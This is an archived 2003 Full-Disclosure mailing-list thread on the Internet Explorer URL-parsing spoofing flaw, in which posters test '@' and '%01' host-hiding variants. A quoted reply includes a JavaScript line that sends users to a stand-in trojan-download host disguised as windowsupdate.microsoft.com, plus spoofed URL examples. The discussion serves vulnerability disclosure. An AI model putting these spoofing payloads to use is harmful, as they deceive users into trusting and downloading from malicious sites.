[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

To: "Julian HO Thean Swee" <jho@starhub.com>, <full-disclosure@lists.netsys.com>
Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
From: "VeNoMouS" <venom@gen-x.co.nz>
Date: Wed, 10 Dec 2003 18:03:00 +1300

RE: FWD: Internet Explorer URL parsing vulnerabilityumm tested this you dont
need %01 either btw.

www.microsoft.com@www.linux.org

was messing around with some hex stile as well is there a way to call a file://
inside a http:// becos the issue with doing the @ trick is it appends http://
automaticly, mind you , u could just make it exec some vb code or something on
a site, just a random idea any way

and it dont also seem to work if you use hex as well for the full domain ie

www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67

nor www.microsoft.com%40www.linux.org

where as if you www.microsoft.com@%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 works

----- Original Message -----
From: Julian HO Thean Swee
To: 'full-disclosure@lists.netsys.com'
Sent: Wednesday, December 10, 2003 4:22 PM
Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing
vulnerability

Hmm, it doesn't seem to work on my browser :)
I don't even get transported to any page when i click the button.
But then again, i have everything turned off in the internet zone by
default...
(but my submit non-encrypted form data is on)

Does it really work then? it looks like it's using javascript...?
(location.href)
Merry Christmas everyone :)

--__--__--

Message: 1
Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST)
From: S G Masood <sgmasood@yahoo.com>
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing
vulnerability

LOL. This is so simple and dangerous, it almost made
me laugh and cry at the same time. Most of you will
realise why...;D
The Paypal, AOL, Visa, Mastercard, et al email
scammers will have a harvest of gold this month with
lots of zombies falling for this simple technique.

># POC ##########
>http://www.zapthedingbat.com/security/ex01/vun1.htm

Dont be surprised if your latest download from
http://www.microsoft.com turns out to be a trojan!

location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadaneviltrojanfromme.com);

--
S.G.Masood

Hyderabad,
India

PS: One more thing - no scripting required to exploit this.

__________________________________
Do you Yahoo!?
Free Pop-Up Blocker - Get it now
http://companion.yahoo.com/

This email is confidential and privileged. If you are not the intended
recipient, you must not view, disseminate, use or copy this email. Kindly
notify the sender immediately, and delete this email from your system. Thank
you.

Please visit our website at www.starhub.com

Follow-Ups:
- Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
  - From: S G Masood <sgmasood@yahoo.com>
- RES: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
  - From: "Cleber P. de Souza" <cleber.souza@cmp.ind.br>

References:
- [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
  - From: Julian HO Thean Swee <jho@starhub.com>

Prev by Date: Re: [Full-Disclosure] Antivirus Software Solutions?
Next by Date: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Previous by thread: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Next by thread: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Index(es):
- Date
- Thread